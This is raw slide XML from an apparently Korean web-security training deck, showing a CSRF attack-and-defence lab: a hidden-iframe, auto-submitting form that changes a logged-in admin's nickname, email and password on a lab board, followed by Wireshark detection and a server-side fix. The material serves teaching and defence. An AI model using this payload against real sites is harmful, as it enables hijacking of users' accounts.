                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B41ED67-59D4-466F-A6C9-3816229FC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58" y="1061357"/>
            <a:ext cx="5400675" cy="18907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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24948688-B129-4FA9-9855-0392938A89AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="489858" y="30173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&lt;</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소스 설명</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&gt;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sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="_x926135432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7193BE85-1B27-4AF2-BDD2-4C0D68BD4B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="489858" y="3474584"/>
            <a:ext cx="5456238" cy="2433638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="4191">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함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>&lt;iframe name="ifrm" width="300" height="300"&gt;&lt;/iframe&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR"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-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US"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게시글에 생기는 창 크기</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>&lt;form target="ifrm" name="write_form" method="post" action="http://web.navy.mil.kr/webhack/member/member_modify_ok.php" enctype="multipart/form-data"&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR"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-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US"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로그인 상태로 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR"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member_modify_ok.php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US"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에서 정보 수정 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>&lt;input type="hidden" name="exec" value="modify"&gt; &lt;input type="hidden" name="nickname" value="hacked"&gt; &lt;input type="hidden" name="email" value="hackedEmail"&gt; &lt;input type="hidden" name="password" value="hacked"&gt; &lt;input type="hidden" name="repassword" value="hacked"&gt; &lt;/form&gt; &lt;script&gt; document.write_form.submit(); &lt;/script&gt; &lt;/frame&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR"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 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>스크립트실행</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR"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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C5D10E8-71B7-40AC-9042-CE6913E34A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="45742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브라우저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iceweasel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프로그램 실행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6153" name="_x927255856">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF738060-CF03-4A14-A4A6-FBD73D171D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6247730" y="914627"/>
            <a:ext cx="5400675" cy="20701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A4DC61D-E4F1-43F3-8002-F32143FC12EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6323467" y="30826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2)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인터넷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url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창에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http://web.navy.mil.kr/webhack</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를 입력하여 피해 서버에 접속</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6155" name="_x926137056">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8B24B89-3F54-4DA5-A8A0-34817D9D98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3467" y="3539898"/>
            <a:ext cx="5400675" cy="277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33860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46402949-32F5-41B3-AD6D-C8551CF0A80C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="465364" y="6029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3)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공격자는 피해 웹페이지에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CSRF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취약점 공격을 실행</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http://web.navy.mil.kr/webhack/webhack/board/board_list.php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이동</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Writing</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를 눌러 게시글 작성</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7169" name="_x924068816">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F1058C-5A84-496B-B8B9-07FB2E823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64" y="1060118"/>
            <a:ext cx="5400675" cy="37036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606094F8-B297-4F39-ADD8-739CDC435475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="836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게시판 글을 그림처럼 작성한 뒤 저장한다</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Author : test01</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Password : test01</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E-mail : test01@hacked.co.kr</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Subject : attack</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Contents : /root/csrf.txt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내용</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7171" name="_x927256216">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20710EC5-7863-490A-8978-0F2B84E88D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9879" r="1270" b="4601"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="1464007"/>
            <a:ext cx="5400675" cy="2536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D64B6BCA-FD81-4672-AF5B-B4F123F09095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6343650" y="406090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4) admin</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계정으로 게시 글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7175" name="_x926137200">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9753093B-20E2-4B61-A0C7-1E49C22DCF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176" t="5753" r="3621" b="20551"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6343650" y="4518103"/>
            <a:ext cx="4924425" cy="174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1193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2341545"/>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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8695217A-D9A3-4103-B14F-6947C32E3FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="522514" y="4980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5) view</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가 변경되면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admin</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계정으로 다시 로그인 해본다</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800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8193" name="_x926137272">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B7D10AD-9DA9-4F59-9E55-1C0DD880B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14" y="955221"/>
            <a:ext cx="3390900" cy="1676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CF4CD88-B8C8-4789-9553-CACBFA805D83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="522514" y="26316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0F9A3C38-8FBA-4A9E-8C92-95FC57B3288E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="2900945"/>
            <a:ext cx="5616792" cy="3599138"/>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3" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A68F782-7E8E-4F9C-AEE5-5F0039F2EE5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="522514" y="3461657"/>
            <a:ext cx="5113020" cy="75431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909570932"/>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/Training/Unit/Web/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 9. 3.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>크로스 사이트 요청변조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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귀하의 공격자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>CSRF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취약점을 사용하여 악성 게시글을 접속하면</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비밀번호가 변경되는 게시글을 만들고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이때 </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의 취약점을 보완할 수 있는 설정을 하여</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차단하여라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>와이어샤크 툴을 이용하여 탐지</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2) CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>공격에 대한 보완 설정</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CSRF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탐지하고 대응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3260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9" name="_x16586784">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31BA9025-283E-4718-B21A-031009289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22" y="806420"/>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9218" name="_x16585848">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAAA3585-C988-4EA4-BA13-CC51F8CE8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022" y="990570"/>
            <a:ext cx="54006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6586352">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56F766B-BB62-4617-8AAD-6196CD0EB3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022" y="2990820"/>
            <a:ext cx="5400675" cy="28352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9A15122-53B0-45FB-810A-6638003788B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="498022" y="3492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웹 서버에서 </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AB85D0FC-85C3-4FEB-8795-1D78C94D045F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="498022" y="9905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아이콘 클릭</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9AD14B7F-B6F0-4D0F-BD96-6B1CFBFE4F99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="498022" y="253362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wireshark</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를 이용하여 악의적인 행위를 하는 패킷 확인</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256E85C8-F9AA-4751-A837-6850D378E9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="498022" y="58260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접속한 웹 서버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IP</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로 들어오는 패킷 중 </a:t>
            </a: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http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패킷으로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POST /webhack/board/board_write_ok.php</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정보로 가져오는 패킷 확인 </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pic>
        <p:nvPicPr>
          <p:cNvPr id="9225" name="_x925233592">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C06BF6-51B5-4FAC-BB2E-FCB14F76EE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450597"/>
            <a:ext cx="5400675" cy="30797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_x927084464">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B8875E-FECA-4442-BF0D-3541C18357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2688"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="3791970"/>
            <a:ext cx="5400675" cy="256285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03F4D73-3291-4C25-AB41-B852E0EC7B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="-15355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2" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5320C7-6644-42BF-BB6F-7A96154F85BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6247730" y="35303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wireshark</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를 이용하여 악의적인 행위를 하는 패킷 확인</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580746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4847981"/>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_x16585632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A49313C-088F-4D49-B104-2CB11A51F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64" y="1097608"/>
            <a:ext cx="5400675" cy="3165475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10241" name="_x928028480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB5EC54-4E71-4302-BBE2-2B640F943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64" y="4720283"/>
            <a:ext cx="5400675" cy="3667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B6EECDF3-18EA-4937-A8BE-CEAA304AC134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="465364" y="6485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1"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r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1000" b="1"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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1000" b="1"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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US"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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US"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1) CSRF</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의 취약점을 보완 설정</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vi var/www/html/webhack/board/board_write_ok.php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15DF112C-FD51-4EE6-B1A5-AE2C428E20F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="465364" y="427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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>  </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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US"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서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR"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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t># service httpd restart </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>󰏮</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="ko-K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5D962D58-0365-4429-9633-DD5B1B8B921C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="5363935"/>
            <a:ext cx="5616792" cy="1136147"/>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DA98924E-5DB4-443D-93E4-57430AEFF16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609191" y="5861957"/>
            <a:ext cx="5113020" cy="569421"/>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59033881"/>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3514511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221630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3470954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740366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 name="Picture 2" descr="차세대 보안리더 양성 프로그램 BoB 12기 모집, 예비 화이트햇 해커 모여라">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1DFB8C-E0B3-4ECE-99FD-E031384F3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1590" y="2945493"/>
            <a:ext cx="3811125" cy="321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53001</TotalTime>
  <Words>35728</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>8115</Paragraphs>
  <Slides>447</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447</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="470" baseType="lpstr">
      <vt:lpstr>Apple SD Gothic Neo</vt:lpstr>
      <vt:lpstr>AppleSDGothicNeo</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>HY중고딕</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>Noto Sans KR</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Montserrat</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Raleway</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/Environ/WSL2(command)  WSL2 command 설치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양수</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 - 진수</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 – 진수</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 – 진수</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14  음수의 표현</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File Management</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/Training/Unit/Web/8  8. XSS 공격/방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/8  8. XSS 공격/방어 - 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/9  9. 3.1. 크로스 사이트 요청변조</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/9  9. 3.1. 크로스 사이트 요청변조 - 대응</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Author</cp:lastModifiedBy>
  <cp:revision>798</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-01T00:18:56Z</dcterms:modified>
</cp:coreProperties>
</file>